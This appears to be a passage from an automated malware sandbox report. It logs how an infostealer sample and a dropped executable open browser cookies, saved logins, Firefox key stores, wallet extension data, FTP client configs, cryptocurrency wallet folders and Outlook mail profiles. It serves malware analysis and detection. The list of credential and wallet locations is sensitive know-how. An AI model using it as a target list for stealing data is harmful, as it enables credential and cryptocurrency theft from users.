Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Searches for user specific document files
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
